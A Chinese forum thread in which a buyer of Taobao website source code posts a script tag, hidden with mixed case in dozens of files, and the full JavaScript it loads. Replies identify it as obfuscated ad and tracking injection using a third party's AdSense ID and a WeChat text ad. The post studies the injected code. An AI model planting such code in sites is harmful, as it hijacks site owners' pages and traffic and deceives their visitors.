淘宝买的源码怀疑有马,大佬帮忙分析下这个JS是干吗？

送子神医

淘宝买的源码怀疑有马，发现几十个文件都引用了这个JS代码，大佬帮忙分析下这个JS是干吗？

1. <sCRiPT src=//DwZ.cN/jscnzz></sCRIpT>

复制代码

通过不断的变换大小写字母，在几十个文件里插入了这段短网址引用的JS代码，
短网址跳转的链接地址是 http://dayeweb.linggao8sj.cn/images/js/jquery.min.js
里面的代码：小白水平，只能看懂一部分

1. <!--
   
2. function tmpCK(n,v,s){
   
3.         if(v){
   
4.                 var t1=new Date();t1.setTime(t1.getTime()+(s*1000));
   
5.                 document.cookie = n+"="+escape(v)+";expires="+t1.toGMTString()+";path=/;";
   
6.         }else{
   
7.                 var a1=document.cookie.split("; ");
   
8.                 for(var i=0;i<a1.length;i++){var a2=a1[i].split("=");if(a2[0]==n){v=a2[1];}}
   
9.         }
   
10.         return v;
    
11. }
    
12. function tmpCheckRef(s){
    
13.         var a="&pn=0|tongji.baidu.com|umeng.com|chinaz.com|aizhan.com|51.la".split("|");
    
14.         for(i=0;i<a.length;i++){
    
15.                 if(s.indexOf(a[i])!=-1){
    
16.                         return false;
    
17.                 }
    
18.         }
    
19.         return true;
    
20. }
    
21. function tmpPass(s){
    
22.         var a="shjfjx.cn|baobaophoto.com".split("|");
    
23.         for(i=0;i<a.length;i++){
    
24.                 if(s.indexOf(a[i])!=-1){
    
25.                         return false;
    
26.                 }
    
27.         }
    
28.         return true;
    
29. }
    
30. function tmpCheckGG(s){
    
31.         var a="sdyyyz.net|ychsyxx.com|sqnsbd.cn|fsbhsyxx.com|lgzkck.com|ccinchina.com|cnwhkc.com|yznsbd.com|lzhdcy.com|dongfangrilong.com|janlea.com.cn|hansbd.cn|xinxiancai.com|zgks123.com|gxmsyfx.com|dxd.cn|serverall.com.cn|rcet.cn|m.hqx666.com|jzzxzg.com|jsnsbd.cn|hongyuanjianshe.com|jjghsjy.com|jsnsbd.com|wap.reprc.com|gorsun.com|sewhy.com|xin-lian.cn|xingyuntuofu.com|allcoolmen.com|zrsh100.com|dhbly.com|zzdingsheng.net|0592jhy.com|51zxwd.com|gxgjgf.com|jsjzcks.com|pdsby.com|4g.xadcfk.com|mm.allcoolmen.com|szrcm.com|m.ylhasd.com|bankxc.cn|henanart.com|obolee.com.cn|remotcon.net|shenerkj.cn|xadcfk.com|jxlakeside.com|pc.cqddgc.cn|hebeipet.com|hnfejx.com|hngd99.com|jiaransheng.com|asia.eeeex.com|m.idianzheng.com|bio-redwood.com|byguan.com|ccsytz.com|gsym.com|m88888888.com|zhuxuecai.com|haoyijia88.com|hushi.zgks123.com|sn.dxd.cn|chinaquannao.com|dyssw.com|nyxgl.com|szlove.com|feidongman.com|diqiushijie.com|caibocn.com|qdhswj.com|saglee.com.cn|wysxbqx.com|.edu.cn|.gov.cn|bjfynjk.com|fanyiyuanlin.com|fanyi-design.net|cqqlxh.com|cscec2bzcb.com.cn|msheying.com|shadou.net|znzkck.com|caea.org.cn|210.35.32.5|561365.com|61.150.112.62|aoyou扶墙165.com|aoyou扶墙173.com|bssgnu.cn|cfpawd.cn|cjwvkk.cn|ckdszq.cn|goodnic.net|gxszk.net|hoypyr.cn|jdbot.net|juyantang.cn|luoyangnanke.com|m.daxuehua.com|meinvxiezhen.eeeex.com|mmsbvq.cn|mqvchw.cn|mxoueg.cn|obeacz.cn|oshoxw.cn|49host.com|wlwlbo.cn|wwohan.cn|750v.com|915fu.com|anzhuo.me|bailubf.com|bzt.cn.com|cqzs100.com|daxuehua.com|dgtvad.com|diannaowang.net|fxisjl.cn|gdrelx.com|gzdic.cn|hxffbw.com|jianjian.org|jvhao.com|jzsports.cn|leimost.com|lelers.com|mitalit.com|mxgzt.com|nuoruima.com|scyakeli.com|sh-yaoxing.com|shenbar.com|shxdre.com|ustb-mba.com|whcfht.com|xjj01.com|ylhasd.com|youyuzheng120.com|zhainancili.net|zhihgk.com|zlfour.cn|zwecun.cn|zzwk.cn|yuemei120.com|zqfsyl.cn|zrhagw.cn|zrqfdn.cn|001gm.net|kuadmin.cn|haiqiaoshiji.com|nsbdjssy.com|kafuter.cn|rmzt.com|ttzqnews.com|fangshifu.com|janlea.com|qxgs.cn|worldkids.com.cn".split("|");
    
32.         for(i=0;i<a.length;i++){
    
33.                 if(s.indexOf(a[i])!=-1){
    
34.                         return false;
    
35.                 }
    
36.         }
    
37.         return true;
    
38. }
    
39. if(typeof(tmpRef)=="undefined"){
    
40.         var tmpBody=document.body;
    
41.         var tmpHost=window.location.host.replace("www.","");
    
42.         var tmpRef=tmpCK('re'+'f')?tmpCK('re'+'f'):tmpCK('re'+'f',document.referrer,9999);
    
43.         if(tmpRef&&tmpPass(tmpHost)){
    
44.                 var tmpHead=document.getElementsByTagName("head")[0];
    
45.                 var tmpWX='y'+'x7'+'1y'+'x';var tmpText=unescape("%u60A8%u53EF%u4EE5%u6DFB%u52A0%u201C%23wx%23%u201D%u5FAE%u4FE1%u53F7%uFF0C%u54A8%u8BE2%u201C%23tt%23%u201D...").replace("#wx#",tmpWX).replace("#tt#","\u7535\u5f71\u002f\u8fde\u7eed\u5267\u002f\u97f3\u4e50\u002f\u6587\u6863\u002f\u4f18\u60e0\u5377");
    
46.                 if(tmpRef.indexOf(tmpHost)==-1&&tmpCheckRef(tmpRef)){
    
47. 
    
48.                         var tmpMeta = document.createElement('me'+'ta');
    
49.                         tmpMeta.name = 'vi'+'ewpo'+'rt';
    
50.                         tmpMeta.content = 'wid'+'th=de'+'vice-wid'+'th,init'+'ial-sca'+'le=1'+'.0,ma'+'xim'+'um-sc'+'ale=1'+'.0,us'+'er-sc'+'alab'+'le=n'+'o';
    
51.                         tmpHead.appendChild(tmpMeta);
    
52.                         var tmpJs = document.createElement('scr'+'ipt');
    
53.                         tmpJs.src = 'htt'+'ps:/'+'/v'+'1.cn'+'zz.co'+'m/z_st'+'at.ph'+'p?i'+'d=590'+'4975&web_i'+'d=590'+'4975';
    
54.                         tmpHead.appendChild(tmpJs);
    
55.                         var tmpAd = document.createElement('scr'+'ipt');
    
56.                         tmpAd.src = '//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js';
    
57.                         tmpHead.appendChild(tmpAd);
    
58.                         tmpAd.onload=tmpAd.onreadystatechange=function(){(adsbygoogle = window.adsbygoogle || []).push({google_ad_client:"pub-1732909096494993",enable_page_level_ads: true});}
    
59.                         if(tmpCheckGG(tmpHost)){
    
60.                                 var ggDiv=document.createElement('di'+'v');
    
61.                                 ggDiv.innerHTML='<d'+'iv st'+'yle="posi'+'tion:fi'+'xed;t'+'op:0;le'+'ft:0;z-ind'+'ex:21474'+'83648;_posi'+'tion:abso'+'lute;wid'+'th:10'+'0%;te'+'xt-al'+'ign:cen'+'ter;"><'+'a hr'+'ef="ja'+'vascr'+'ipt:'+';" tit'+'le="clo'+'se" oncl'+'ick="th'+'is.parentNo'+'de.parentNo'+'de.parentNo'+'de.removeCh'+'ild(th'+'is.parentNo'+'de.parentNo'+'de)" st'+'yle="posi'+'tion:abso'+'lute;to'+'p:0;ri'+'ght:0;z-ind'+'ex:21474'+'83649;disp'+'lay:blo'+'ck;wid'+'th:5'+'0px;hei'+'ght:2'+'0px;co'+'lor:#f6'+'6;ba'+'ckgro'+'und:#f'+'ff;">\u5173\u95ed</'+'a><i'+'ns cl'+'ass="a'+'dsbygo'+'ogle" st'+'yle="di'+'spl'+'ay:blo'+'ck;te'+'xt-al'+'ign:ri'+'ght;" da'+'ta-a'+'d-clie'+'nt="c'+'a-p'+'ub-17'+'3290'+'9096'+'4949'+'93" da'+'ta-a'+'d-sl'+'ot="272'+'8648'+'043" da'+'ta-a'+'d-fo'+'rmat="au'+'to"></i'+'ns></d'+'iv>';
    
62.                                 tmpBody.insertBefore(ggDiv,tmpBody.firstChild);
    
63.                                 var ggJs = document.createElement('scr'+'ipt');
    
64.                                 ggJs.type = 'text/javascript';
    
65.                                 ggJs.async = true;
    
66.                                 ggJs.src = '//pag'+'ea'+'d2.go'+'ogles'+'yndicati'+'on.c'+'om/pa'+'gea'+'d/j'+'s/a'+'dsbygo'+'ogle.j'+'s';
    
67.                                 tmpHead.appendChild(ggJs);
    
68.                                 ggJs.onload=ggJs.onreadystatechange=function(){
    
69.                                         if(!this.readyState||this.readyState=='loaded'||this.readyState=='complete'){
    
70.                                                 ggDiv.style.height="9"+"0p"+"x";
    
71.                                                 (adsbygoogle = window.adsbygoogle || []).push({});
    
72.                                         }
    
73.                                         ggJs.onload=ggJs.onreadystatechange=null;
    
74.                                 }
    
75.                         }
    
76.                 }
    
77.         }
    
78. }
    
79. -->

复制代码

流浪的鹰

刷黑SEO的和统计

alfonse

楼上说的对。。。

hxuf

淘宝买源码不如谷歌找

ApkB

投诉去吧，给你挖了坑

tj646

在页面插入了GG广告和CNZZ统计。
还有一句

1. "您可以添加“yx71yx”微信号，咨询“电影/连续剧/音乐/文档/优惠卷”..."

复制代码

文字广告。

allnetstore

这属于破坏计算机系统罪